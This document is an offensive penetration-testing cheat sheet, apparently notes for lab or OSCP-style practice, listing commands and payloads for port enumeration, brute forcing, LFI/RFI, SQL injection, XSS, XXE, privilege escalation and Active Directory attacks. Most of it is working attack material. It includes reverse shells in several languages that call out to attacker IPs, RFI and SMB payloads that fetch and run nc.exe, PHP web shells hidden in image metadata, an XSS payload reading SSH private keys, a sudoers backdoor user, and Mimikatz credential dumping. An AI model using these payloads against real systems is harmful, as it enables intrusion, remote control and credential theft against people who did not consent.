🎩Port 6379 - Redis🎩

https://github.com/Avinash-acid/Redis-Server-Exploit
python redis.py 10.10.10.160 redis

https://github.com/vulhub/redis-rogue-getshell.git
sudo python3 redis-master.py -r 192.168.89.69 -L 192.168.49.89 -P 80 -f RedisModulesSDK/exp.so -c "bash -c 'bash -i >& /dev/tcp/192.168.49.89/8080 0>&1'"

Ref: Sybaris, Wombo

🎩Port 8172 - MsDeploy🎩

Microsoft IIS Deploy port
IP:8172/msdeploy.axd

🎩Port 27017 - MongoDB🎩

https://book.hacktricks.xyz/pentesting/27017-27018-mongodb
#By default all the nmap mongo enumerate scripts are used: 
nmap -sV --script "mongo* and default" -p 27017 <IP>

🎩Webdav🎩

davtest -cleanup -url http://target

cadaver http://target

🎩Unknown ports🎩

amap -d 10.11.1.111 8000

netcat: makes connections to ports. Can echo strings or give shells: 
nc -nv 10.11.1.111 110

sfuzz: can connect to ports, udp or tcp, refrain from closing a connection, using basic HTTP configurations

Try zone transfer for subdomains: 
dig axfr @10.11.1.111 hostname.box, dnsenum 10.11.1.111, dnsrecon -d domain.com -t axfr

🎩FOOTHOLD🎩

Find exploits:

LOCATE:

┌──(kali💀kali)-[~]
└─$ locate SecLists

SEARCHSPLOIT:

┌──(kali💀kali)-[~]
└─$ searchsploit --id 43560.py

┌──(kali💀kali)-[~/Desktop]
└─$ searchsploit -m 43560.py
  Exploit: 
      URL: 
     Path: 
    Codes: 
 Verified: 
File Type: 
Copied to: 

# Remove dos-exploits
searchsploit Apache 2.4.7 | grep -v '/dos/'
searchsploit Apache | grep -v '/dos/' | grep -vi "tomcat"

# Only search the title (exclude the path), add the -t
searchsploit -t Apache | grep -v '/dos/'

GOOGLE:
site:exploit-db.com apache 2.4.7

# Multipurpose
https://github.com/
https://shodan.io/
https://censys.io/
https://www.virustotal.com/gui/my-apikey
https://securitytrails.com/app/account/credentials
https://binaryedge.io/data.html 
https://urlscan.io/ 
https://intelx.io/ 
https://chaos.projectdiscovery.io/#/
https://community.riskiq.com/ 
https://spyse.com/
https://www.domaintools.com/resources/user-guides/#dnsdb 
https://onyphe.io/
https://app.netlas.io/
https://hunter.how/
https://fofa.so/
https://fullhunt.io/
https://www.zoomeye.org/
https://www.criminalip.io/
https://leakix.net/
https://www.yougetsignal.com/
https://intelx.io/
https://pentest-tools.com/
https://gofindwhois.com/
https://gofindwho.com/
https://web-check.as93.net/

$ python3 censys-subdomain-finder.py example.com

https://github.com/SmoZy92/Shodomain
$ python shodomain.py <SHODAN-API-KEY> example.com

https://github.com/Cgboal/SonarSearch
$ crobat -s example.com

# Default credentials lists
https://cirt.net/passwords
https://github.com/danielmiessler/SecLists/tree/master/Passwords/Default-Credentials
https://github.com/LandGrey/pydictor
https://github.com/Mebus/cupp
https://github.com/sc0tfree/mentalist
https://github.com/ihebski/DefaultCreds-cheat-sheet
https://github.com/noraj/pass-station/

# Search documentation for default passwords and test them
site:webapplication.com password

admin / admin
admin / password
admin / admin12345
admin / letmeinplease
admin / <blank>
admin / <servicename>
admin / <name of the box>
administrator / admin
user / user
user / 12345
user / password
guest / guest
root / root
root / admin
root / password
root / <servicename>
<username if you have> / password
<username if you have> / admin
<username if you have> / username
username / <servicename>
<name of the box> / <name of the box>
<name of the service / application> <name of the service / application>
default account / <name of the application>

🎩PASSWORD BRUTE-FORCE - LAST RESORT 🎩

cewl
hash-identifier
pdfcrack SomeFile.pdf -w ~kali/rockyou.txt (For PDF files with passwords)
fcrackzip -u -D -p ~kali/rockyou.txt SomeZip.backup (Cracking zip files passwords)
rar2john MSSQL_BAK.rar --> john -wordlist=/home/kali/rockyou.txt MSQL.hashes (Cracking rar files)
john --rules --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt
john --wordlist=/home/kali/rockyou.txt sammy_hash.txt # Crack user hash [user:hash] in file
medusa -h 10.11.1.111 -u admin -P password-file.txt -M http -m DIR:/admin -T 10
ncrack -vv --user offsec -P password-file.txt rdp://10.11.1.111
crowbar -b rdp -s 10.11.1.111/32 -u victim -C /root/words.txt -n 1
hydra -l root -P password-file.txt 10.11.1.111 ssh
hydra -P password-file.txt -v 10.11.1.111 snmp
hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f 10.11.1.111 ftp -V
hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f 10.11.1.111 pop3 -V
hydra -P /usr/share/wordlistsnmap.lst 10.11.1.111 smtp -V

# SIMPLE LOGIN GET
hydra -L cewl_fin_50.txt -P cewl_fin_50.txt 10.11.1.111 http-get-form "/~login:username=^USER^&password=^PASS^&Login=Login:Unauthorized" -V

# GET FORM with HTTPS
hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.11.1.111 -s 443 -S https-get-form "/index.php:login=^USER^&password=^PASS^:Incorrect login/password\!"

# SIMPLE LOGIN POST
hydra -l root@localhost -P cewl 10.11.1.111 http-post-form "/otrs/index.pl:Action=Login&RequestedURL=&Lang=en&TimeOffset=-120&User=^USER^&Password=^PASS^:F=Login failed" -I

# API REST LOGIN POST
hydra -l admin -P /usr/share/wordlists/wfuzz/others/common_pass.txt -V -s 80 10.11.1.111 http-post-form "/centreon/api/index.php?action=authenticate:username=^USER^&password=^PASS^:Bad credentials" -t 64

# Dictionary creation
https://github.com/LandGrey/pydictor
https://github.com/Mebus/cupp
git clone https://github.com/sc0tfree/mentalist.git

# base64 Decode
┌──(kali💀kali)-[~]
└─$ echo "PD9waHAKcHJpbnRfcihpbmlfZ2V0X2FsbCgpKTsKPz4K" | base64 --decode

					# Hashcat
https://hashcat.net/wiki/doku.php?id=example_hashes // m parameter
https://mattw.io/hashID/types // hashid match

hashcat -m 0 'hash$' /home/kali/rockyou.txt // MD5 raw
hashcat -m 1800 'hash$' /home/kali/rockyou.txt // sha512crypt
hashcat -m 1600 'hash$' /home/kali/rockyou.txt // MD5(APR)
hashcat -m 1500 'hash$' /home/kali/rockyou.txt // DES(Unix), Traditional DES, DEScrypt
hascat  -m 1000 'hash$' /home/kali/rockyou.txt // NTLM
hashcat -m 500 'hash$' /home/kali/rockyou.txt // MD5crypt, MD5 (Unix)
hashcat -m 400 'hash$'/home/kali/rockyou.txt // Wordpress

					# Online crackers:  
https://hashkiller.co.uk/Cracker
https://www.cmd5.org/
https://www.onlinehashcrack.com/
https://gpuhash.me/
https://crackstation.net/
https://crack.sh/
https://hash.help/
https://passwordrecovery.io/
http://cracker.offensive-security.com/

					# Word lists
https://github.com/danielmiessler/SecLists/tree/master/Discovery/Web-Content
    - raft-large-directories-lowercase.txt
    - directory-list-2.3-medium.txt
    - RobotsDisallowed/top10000.txt 
https://github.com/assetnote/commonspeak2-wordlists/tree/master/wordswithext    - 
https://github.com/random-robbie/bruteforce-lists
https://github.com/google/fuzzing/tree/master/dictionaries
https://github.com/six2dez/OneListForAll
AIO: https://github.com/foospidy/payloads
Check https://wordlists.assetnote.io/

🎩LFI / RFI🎩

┌──(kali㉿kali)-[~]
└─$ fimap -u "http://10.11.1.111/example.php?test="

# Ordered output
┌──(kali㉿kali)-[~]
└─$ curl -s http://10.11.1.111/gallery.php?page=/etc/passwd
/root/Tools/Kadimus/kadimus -u http://10.11.1.111/example.php?page=

http://10.11.1.111/index.php?page=php://filter/convert.base64-encode/resource=/etc/passwd && base64 -d savefile.php
http://10.11.1.111/page=http://10.11.1.111/maliciousfile.txt%00 or ?
?page=php://filter/convert.base64-encode/resource=../config.php

file=C:\windows\system32\drivers\etc\hosts  #Windows file

┌──(kali㉿kali)-[~]
└─$ amap -d 10.11.1.111 8000

# LFI Windows
http://10.11.1.111/addguestbook.php?LANG=../../windows/system32/drivers/etc/hosts%00

../../../../../boot.ini  #Windows file


# Contaminating log files
root@kali:~# nc -v 10.11.1.111 80
10.11.1.111: inverse host lookup failed: Unknown host
(UNKNOWN) [10.11.1.111] 80 (http) open
 <?php echo shell_exec($_GET['cmd']);?>

http://10.11.1.111/addguestbook.php?LANG=../../xampp/apache/logs/access.log%00&cmd=ipconfig  #Will work if directory traversal is available.

# RFI:
http://10.11.1.111/addguestbook.php?LANG=http://10.11.1.111:31/evil.txt%00
Content of evil.txt:
<?php echo shell_exec("nc.exe 10.11.0.105 4444 -e cmd.exe") ?>

# PHP Filter:
http://10.11.1.111/index.php?m=php://filter/convert.base64-encode/resource=config

# RFI over SMB (Windows)
cat php_cmd.php
	<?php echo shell_exec($_GET['cmd']);?>
- Start SMB Server in attacker machine and put evil script
- Access it via browser (2 request attack):
	- http://10.11.1.111/blog/?lang=\\ATTACKER_IP\ica\php_cmd.php&cmd=powershell -c Invoke-WebRequest -Uri "http://10.10.14.42/nc.exe" -OutFile "C:\\windows\\system32\\spool\\drivers\\color\\nc.exe"
	- http://10.11.1.111/blog/?lang=\\ATTACKER_IP\ica\php_cmd.php&cmd=powershell -c "C:\\windows\\system32\\spool\\drivers\\color\\nc.exe" -e cmd.exe ATTACKER_IP 1234


BYPASS IMAGE UPLOAD RESTRICTIONS
- Change extension: .pHp3 or pHp3.jpg
- Modify mimetype: Content-type: image/jpeg
- Bypass getimagesize(): exiftool -Comment='<?php echo "<pre>"; system($_GET['cmd']); ?>' file.jpg
- Add gif header: GIF89a;
- All at the same time.

🎩SQL-INJECTION🎩

SQL injection cheat sheet | Web Security AcademyWebSecAcademy

GitHub - payloadbox/sql-injection-payload-list: 🎯 SQL Injection Payload ListGitHub

admin';#
' OR 1=1;#

# References
https://portswigger.net/web-security/sql-injection
https://portswigger.net/web-security/sql-injection/cheat-sheet
https://www.exploit-db.com/papers/17934
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection
https://book.hacktricks.xyz/pentesting-web/sql-injection
https://pentestwiki.org/sql-injection/ 
https://www.tarlogic.com/blog/red-team-tales-0x01/

# Enumeration
' ORDER BY 1--      #Increase the number to determine the number of columns
' UNION SELECT NULL,NULL,NULL--   #Confirm the "Order by" statement 
' UNION SELECT NULL,NULL,'a',NULL-- #Define string/numerical data

# Database Attacks
'+UNION+SELECT+@@version,+NULL#
SELECT * FROM information_schema.tables

SHOW GRANTS;  #Get current user permissions

SHOW VARIABLES; #Get variables related to the environment

select @@hostname, @@tmpdir, @@version, @@version_compile_machine, @@plugin_dir; #MySQL database enumeration query

'+UNION+SELECT+table_name,+NULL+FROM+information_schema.tables--  #List Tables

'+UNION+SELECT+column_name,+NULL+FROM+information_schema.columns+WHERE+table_name='users_abcdef'--  #List Columns

'+UNION+SELECT+username,+password+FROM+users--    #Get Username & Password

'+UNION+SELECT+NULL,username||'~'||password+FROM+users--     #Concatenation for multiple vaules

# SQL Web Shell
'UNION SELECT "<?php echo passthru($_GET['cmd']);?>" INTO OUTFILE 'C:/xampp/htdocs/command.php'>) #MedJed

# Blind Enumeration (https://auspisec.com/blog/20220118/proving_grounds_butch_walkthrough.html)
TrackingId =u5YD3PapBcR4lN3e7Tj4' AND '1'='1    #Test w/ a condition based injection (True or False)

' IF (1=1) WAITFOR DELAY '0:0:10';--  #Evaluates to true and waits 10 secs (Time Delay based)

' IF ((select count(name) from sys.tables where name = 'users')=1) WAITFOR DELAY '0:0:10';--  #This query uses Boolean to guess the table name of a database

' IF ((select count(c.name) from sys.columns c, sys.tables t where c.object_id = t.object_id and t.name = 'users' and c.name = 'username')=1) WAITFOR DELAY '0:0:10';-- #This query uses Boolean to guess the column name of a table

TrackingId=xyz' AND (SELECT 'a' FROM users LIMIT 1)='a #This query verifies there is table called users.

TrackingId=xyz' AND (SELECT 'a' FROM users WHERE username='administrator' AND LENGTH(password)>1)='a  

#Checks for password length
TrackingId=xyz' AND (SELECT SUBSTRING(password,3,1) FROM users WHERE username='administrator')='§a§  #Use with Burp Sniper, a Simple List Payload, and Grep Match to find the password one character at a time incrementing to total length.

TrackingId =u5YD3PapBcR4lN3e7Tj4' AND SUBSTRING((SELECT Password FROM Users WHERE Username = 'Administrator'), 1, 1) > 'm #This query checks to narrow the first letter of the 'Admin' password

# Blind Oracle sqli (https://portswigger.net/web-security/sql-injection/blind/lab-conditional-errors)
 TrackingId=Vqg7K1mFWH8hNMMb'||(SELECT+CASE+WHEN+SUBSTR(password,§1§,1)='§a§'+THEN+TO_CHAR(1/0)+ELSE+NULL+END+FROM+users+WHERE+username%3d+'administrator')||'  # Used Burp Cluster bomb to iterate through the length of the password and simplelist.

 #Time-Delay SQLi
 TrackingId=jSeXZLJoesz7M9ZH'||pg_sleep(10)--   #The key here is to conactenat the normal query w/ the sleep payload as it is generally processed synchronously by the application.

TrackingId='%3BSELECT+CASE+WHEN+(1=1)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END--   # Validate the payload still works for the delay.

TrackingId='%3BSELECT+CASE+WHEN+(username='administrator')+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+users--; # Check for 'administrator' in the 'users' table

TrackingId='%3BSELECT+CASE+WHEN+(username='administrator'+AND+LENGTH(password) >19)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+users--  # Check length of PW.

TrackingId='%3BSELECT+CASE+WHEN+(username='administrator'+AND+SUBSTRING(password,20,1)='§a§')+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+users--  #Use Sniper to retrieve PW.

# Post
./sqlmap.py -r search-test.txt -p tfUPass  #<-p> is the parameter to test in the file
[From Burp to confirm] POST /issue/checkByPriority?priority=Normal'+UNION+SELECT+sleep(5);+--+- HTTP/1.1

sqlmap -r post.login.req --threads=1 --time-sec=1 --level=5 --risk=3 --dbms=mssql -T users -C username,password_hash --random-agent --batch --dump

# Get
sqlmap -u "http://10.11.1.111/index.php?id=1" --dbms=mysql

# Crawl
sqlmap -u http://10.11.1.111 --dbms=mysql --crawl=3

# Full auto - THE GOOD ONE
sqlmap -u 'http://10.11.1.111:1337/978345210/index.php' --forms --dbs --risk=3 --level=5 --threads=4 --batch
# Columns
sqlmap -u 'http://admin.cronos.htb/index.php' --forms --dbms=MySQL --risk=3 --level=5 --threads=4 --batch --columns -T users -D admin
# Values
sqlmap -u 'http://admin.cronos.htb/index.php' --forms --dbms=MySQL --risk=3 --level=5 --threads=4 --batch --dump -T users -D admin

sqlmap -o -u "http://10.11.1.111:1337/978345210/index.php" --data="username=admin&password=pass&submit=+Login+" --method=POST --level=3 --threads=10 --dbms=MySQL --users --passwords

sqlmap http://192.168.133.52/zm/index.php --data="view=request&request=log&task=query&limit=100&minTime=5" -D zm --tables --threads 5
# NoSQL
' || 'a'=='a
mongodbserver:port/status?text=1

#in URL
username[$ne]=toto&password[$ne]=toto

#in JSON
{"username": {"$ne": null}, "password": {"$ne": null}}
{"username": {"$gt":""}, "password": {"$gt":""}}

## SSRF
web that send request to external IP's, we call 127.0.0.1:8080 / 10.1.10.111 to enum internal network
chat:3000/ssrf?user=&comment=&link=http://127.0.0.1:3000
GET /ssrf?user=&comment=&link=http://127.0.0.1:3000 HTTP/1.1

Also we can enum ports

SQL-LOGIN-BYPASS
- Open Burp-suite
- Make and intercept a request
- Send to intruder
- Cluster attack.
- Paste in sqlibypass-list (https://bobloblaw.gitbooks.io/security/content/sql-injections.html)
- Attack
- Check for response length variation

🎩XSS🎩

<script>alert("XSS")</script>
<script>alert(1)</script>

https://www.noob.ninja/2017/11/local-file-read-via-xss-in-dynamically.html?m=1

" <script> x=new XMLHttpRequest; x.onload=function(){ document.write(this.responseText.fontsize(1)) }; x.open("GET","file:///home/reader/.ssh/id_rsa"); x.send(); </script>

" <script> x=new XMLHttpRequest; x.onload=function(){ document.write(this.responseText) }; x.open("GET","file:///etc/passwd"); x.send(); </script>

# XXE
XML entry that reads server, Doctype, change to entity "System "file:///etc/passwd""

Instead POST:
<?xml version="1.0" ?>
    <!DOCTYPE thp [
        <!ELEMENT thp ANY>
        <!ENTITY book "Universe">
    ]>
    <thp>Hack The &book;</thp>

Malicious XML:
<?xml version="1.0" ?><!DOCTYPE thp [ <!ELEMENT thp ANY>
<!ENTITY book SYSTEM "file:///etc/passwd">]><thp>Hack The
%26book%3B</thp>

XXE OOB
<?xml version="1.0"?><!DOCTYPE thp [<!ELEMENT thp ANY >
<!ENTITY % dtd SYSTEM "http://[YOUR_IP]/payload.dtd"> %dtd;]>
<thp><error>%26send%3B</error></thp>

🎩STEGO🎩

┌──(kali💀kali)-[~/Desktop]
└─$ exiftool -Comment='<?php system($_GET['cmd']); ?>' cmd.php.jpg
    1 image files updated

┌──(kali💀kali)-[~/Desktop]
└─$ file minion.jpg 
minion.JPEG: JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, comment: "<?php system($_GET[cmd]); ?>", baseline, precision 8, 300x168, components 3

┌──(kali💀kali)-[~/Desktop]
└─$ exiftool minion.jpg                                 
ExifTool Version Number         : 12.67
File Name                       : minion.JPEG
Directory                       : .
File Size                       : 7.8 kB
File Modification Date/Time     : 2024:01:11 22:31:41-05:00
File Access Date/Time           : 2024:01:11 22:32:50-05:00
File Inode Change Date/Time     : 2024:01:11 22:32:43-05:00
File Permissions                : -rw-r--r--
File Type                       : JPEG
File Type Extension             : jpg
MIME Type                       : image/jpeg
JFIF Version                    : 1.01
Resolution Unit                 : None
X Resolution                    : 1
Y Resolution                    : 1
Comment                         : <?php system($_GET[cmd]); ?>
Image Width                     : 300
Image Height                    : 168
Encoding Process                : Baseline DCT, Huffman coding
Bits Per Sample                 : 8
Color Components                : 3
Y Cb Cr Sub Sampling            : YCbCr4:2:0 (2 2)
Image Size                      : 300x168
Megapixels                      : 0.050

🎩Reverse Shells🎩

Online - Reverse Shell Generatorwww.revshells.com

Reverse Shell Cheat Sheetpentestmonkey

LISTENERS:

nc -nlvp 2560     
nc -lnvp 2560
nc -lvnp 2560

rlwrap nc -nvlp 2560
rlwrap nc -lnvp 2560
rlwrap nc -lvnp 2560

Linux: Bash

bash -i >& /dev/tcp/10.11.1.111/2560 0>&1
echo -e '#!/bin/bash\n\nbash -i >& /dev/tcp/10.10.16.4/2560 0>&1' > file
touch '; nc -c bash 10.10.16.4 2560'
nc -e /bin/sh 10.11.1.111 2560
nc -nv 10.10.16.6 2560 -e /bin/sh
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.11.1.111 2560 >/tmp/f

Windows: Powershell

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.11',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

# The below drops into a cmd.exe shell [ $ps -> into PowerShell / $ps=$false -> to go back to cmd.exe]:
powershell -NoP -NonI -W Hidden -Exec Bypass "& {$ps=$false;$hostip='192.168.49.74';$port=445;$client = New-Object System.Net.Sockets.TCPClient($hostip,$port);$stream = $client.GetStream();[byte[]]$bytes = 0..50000|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$cmd=(get-childitem Env:ComSpec).value;$inArray=$data.split();$item=$inArray[0];if(($item -eq '$ps') -and ($ps -eq $false)){$ps=$true}if($item -like '?:'){$item='d:'}$myArray=@('cd','exit','d:','pwd' ,'ls','ps','rm','cp','mv','cat');$do=$false;foreach ($i in $myArray){if($item -eq $i){$do=$true}}if($do -or $ps){$sendback=( iex $data 2>&1 |Out-String)}else{$data2='/c '+$data;$sendback = ( &$cmd $data2 2>&1 | Out-String)};if($ps){$prompt='PS ' + (pwd).Path}else{$prompt=(pwd).Path}$sendback2 = $data + $sendback + $prompt + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()}"

# Nishang
https://github.com/samratashok/nishang
https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1
https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcpOneLine.ps1
https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellIcmp.ps1

# NC64.exe
https://github.com/int0x33/nc.exe/
https://github.com/int0x33/nc.exe/blob/master/nc64.exe

Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.3 -Port 1234

nc -e cmd.exe 10.11.1.111 4443

MSF:

┌──(kali💀kali)-[~]
└─$ msfconsole  
search 
use 
windows/meterpreter/reverse_tcp

┌──(kali💀kali)-[~/Desktop]
└─$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.3 LPORT=4444 -f exe > shell.exe

PHP:

php-reverse-shellpentestmonkey

php-reverse-shell/php-reverse-shell.php at master · pentestmonkey/php-reverse-shellGitHub

<?php system($_REQUEST["cmd"]); ?>

<?php echo system($_REQUEST ["cmd"]); ?>

<?php $sock = fsockopen("10.11.1.111",1234); $proc = proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock), $pipes);?>

Python:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.11.1.111",4443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

__import__('os').system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.9 4433 >/tmp/f')-1\

Perl:

perl -e 'use Socket;$i="10.11.1.111";$p=4443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Evil-WinRM:

The ultimate WinRM shell for hacking/pentesting 
https://github.com/Hackplayers/evil-winrm

HTSHELLS:

https://github.com/wireghoul/htshells

🎩PRIV ESC🎩

Set up Webserver:

┌──(kali💀kali)-[~/Desktop]
└─$ python -m SimpleHTTPServer 5555

python3 -m http.server 5555

php -S 0.0.0.0:5555

ruby -run  -e -httpd . -p 5555

https://github.com/sc0tfree/updog
updog

File permissions:

# only be readable by you
chmod 400

# change the permissions 
chmod 600 

# Change the file permission to rwx for everyone.
chmod 777 

# execution permissions
chmod +x 

drwxr-xr-x 3 root
lrwxrwxrwx 1 root 

drwx------
drwxr-x---
drwxrwxr-x 
-rw-r--r--
-rw-------
-r--------

Linux Privesc

# BASH: Spawning shell
python3 -c 'import pty; pty.spawn("/bin/bash")'
python -c 'import pty; pty.spawn("/bin/bash")'
python -c 'import pty; pty.spawn("/bin/sh")'
V
Ctrl+Z
stty raw -echo
fg
reset
Ctrl+Z
stty size
stty -rows 48 -columns 120
fg

# BASH: Spawning shell
echo os.system('/bin/bash')
/bin/sh -i
perl -e 'exec "/bin/sh";'
perl: exec "/bin/sh";
ruby: exec "/bin/sh"
lua: os.execute('/bin/sh')
(From within vi)
:!bash
:set shell=/bin/bash:shell
(From within nmap)
!sh

# Download 
wget http://10.10.16.4:5555/nc64.exe -outfile nc.exe

# Download all files
wget http://10.11.1.111:8080/ -r; mv 10.11.1.111:8080 exploits; cd exploits; rm index.html; chmod 700 LinEnum.sh linprivchecker.py unix-privesc-check

# Access to more binaries
export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

# Set up webserver
cd /root/oscp/useful-tools/privesc/linux/privesc-scripts; python -m SimpleHTTPServer 8080; python3 -m http.server 80

./LinEnum.sh -t -k password -r LinEnum.txt
python linprivchecker.py extended
./unix-privesc-check standard

# Writable directories
/tmp
/var/tmp

# Add user to sudoers
useradd hacker
passwd hacker
echo "hacker ALL=(ALL:ALL) ALL" >> /etc/sudoers

# Basic info
which awk perl python python3 ruby gcc cc nano vi vim nmap find netcat nc wget tftp ftp 2>/dev/null
uname -a
env
id
cat /proc/version
cat /etc/issue
cat /etc/passwd
cat /etc/group
cat /etc/shadow
cat /etc/hosts
cat /etc/fstab
cat /etc/crontab

# Users with login
grep -vE "nologin" /etc/passwd

# Priv Enumeration Scripts
upload /unix-privesc-check
upload /root/Desktop/Backup/Tools/Linux_privesc_tools/linuxprivchecker.py ./
upload /root/Desktop/Backup/Tools/Linux_privesc_tools/LinEnum.sh ./

python linprivchecker.py extended
./LinEnum.sh -t -k password
unix-privesc-check

Windows privesc

# Basic info
systeminfo
set
hostname
net users
net user user1
net localgroups
net localgroups Administrators

# Unquoted Service Path:
wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """ 

icacs “C:\Program Files”   #Check for folder/file permissions

F = Full Control
CI = Container Inherit – This flag indicates that subordinate containers will inherit this ACE.
OI = Object Inherit – This flag indicates that subordinate files will inherit the ACE

sc qc <service>  #Checking for Auto start and owner of service

Upload malicious encoded binary in controlled folder to bypass AV  #Reverse Shell

sc stop <service> OR shutdown /r /t 0   #If user has rights and sc stop is now granted

accesschk:
-u: Suppress the errors
-w: Objects with write access
-c: Display service name
-q: Omit Banner
-v: Verbose
accesschk.exe -uwcqv "Authenticated Users" * /accepteula
accesschk64.exe -uwcqv %USERNAME% * /accepteula
accesschk.exe -uwcqv "BUILTIN\Users" * /accepteula

netsh firewall show state
netsh firewall show config
netsh advfirewall firewall show rule name=all
netsh advfirewall show currentprofile

# Set path
set PATH=%PATH%;C:\xampp\php

whoami /priv

dir/a -> Show hidden & unhidden files
dir /Q -> Show permissions
dir [filename] /s /p (s – for all directories and p – pause results)

# Insecure Folder Permission
C:\>cacls C:\bd

# Insecure File/Service Permission
C:\>cacls C:\bd\bd.exe

#Service Query
C:\>sc qc bd

# DOWNLOAD
wget http://10.10.16.4:5555/nc64.exe -outfile nc.exe
powershell wget http://10.10.16.4:5555/shell.bat -outfile shell.bat

# Windows download with certutil.exe
certutil.exe -urlcache -split -f "http://10.11.1.111/Powerless.bat" Powerless.bat

# Windows download with powershell
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.11.1.111/file.exe','C:\Users\Public\file.exe')"

powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.14.8:9005/40564.exe', 'c:\Users\Public\Downloads\40564.exe')"

(New-Object System.Net.WebClient).DownloadFile("http://10.11.1.111/CLSID.list","C:\Users\Public\CLSID.list")

PS C:\> (new-object net.webclient).downloadfile('http://10.10.14.3:5555/JuicyPotato.exe', 'C:\Users\merlin\Desktop\jp.exe')


# Windows create SMB Server transfer files
# Attack machine
python3 /usr/share/impacket/impacket/examples/smbserver.py Lab "/root/labs/public/10.11.1.111"

# Victim machine with reverse shell
Download: copy \\10.11.1.111\Lab\wce.exe .
Upload: copy wtf.jpg \\10.11.1.111\Lab


# Windows NC File Transfer
nc.exe -vn 192.168.119.131 8080 < win_rev.doc #From windows machine
nc -lvnp 8080 > win_rev.doc   #To kali box


# PowerShell Priv Esc
powershell IEX (New-Object Net.WebClient).downloadString('https://192.168.49.221/jaws-enum.ps1')
powershell Invoke-AllChecks

powershell IEX (New-Object Net.WebClient).downloadString('https://192.168.49.221/Jaws.ps1')
powershell.exe -ExecutionPolicy Bypass -File .\jaws-enum.ps1 -OutputFilename EnumOutput.txt

# PowerSploit 
PowerSploit - A PowerShell Post-Exploitation Framework 
https://github.com/PowerShellMafia/PowerSploit/tree/dev

🎩Active Directory🎩

PayloadsAllTheThings/Methodology and Resources/Active Directory Attack.md at master · swisskyrepo/PayloadsAllTheThingsGitHub

# LLMNR/NBT-NS
responder -I eth0 -rdwv #Credential default capture settings

# SMB Relay Attack
python3 /home/kali/.local/bin/ntlmrelayx.py -tf targets.txt -smb2support #Capture creds via SMB (Signing must be 'disabled/not required')

python3 /home/kali/.local/bin/ntlmrelayx.py -tf targets.txt -smb2support -i # Gain a interactive shell with "-i"

# IPv6 Attack
https://dirkjanm.io/worst-of-both-worlds-ntlm-relaying-and-kerberos-delegation/

sudo mitm6 -d marvel.local #Run mitm6 first to IPv6 server

python3 /home/kali/.local/bin/ntlmrelayx.py -6 -t ldaps://192.168.68.122 -wh fakewpad.marvel.local -l lootme # Captures IPv6 request to capture & dump creds to lootme

🎩AD Recon🎩

PayloadsAllTheThings/Methodology and Resources/Active Directory Attack.md at master · swisskyrepo/PayloadsAllTheThingsGitHub

asPeas for enumeration scripting:

GitHub - 61106960/adPEAS: Powershell tool to automate Active Directory enumeration.GitHub

PowerView:

https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993
https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1

Bloodhound:

BloodHound: Six Degrees of Domain Admin — BloodHound 4.3.1 documentationbloodhound.readthedocs.io

AzureHound for Azure Active Directory # 
Install-Module -name Az -AllowClobber | Install-Module -name AzureADPreview -AllowClobber

SharpHound for local Active Directory 
# run the collector on the machine using SharpHound

"Invoke-BloodHound -CollectionMethod All  -Domain <DomainName> -ZipFileName <file.zip>" 
# copy zip over to attack machine to run in neo4j DB

SharpHound:

https://github.com/BloodHoundAD/SharpHound
https://github.com/BloodHoundAD/SharpHound/releases
https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors

Mimikatz:

https://gist.github.com/TarlogicSecurity/2f221924fef8c14a1d8e29f3cb5c5c4a
privilege::debug  #Check Architecture for for correct mimikatz version

	#Password / Hash Grabbing Techniques
sekurlsa::logonpasswords  #Dump cached passwords from logins

lsadump::sam #Dumps passwords/hashes in sam file
lsadump::secrets #Dumps passwords

lsadump::dcsync /domain:corp.com /user:jeff_admin #Creates a ntlm hash from DC for lateral move

	## Invoke-Mimikatz
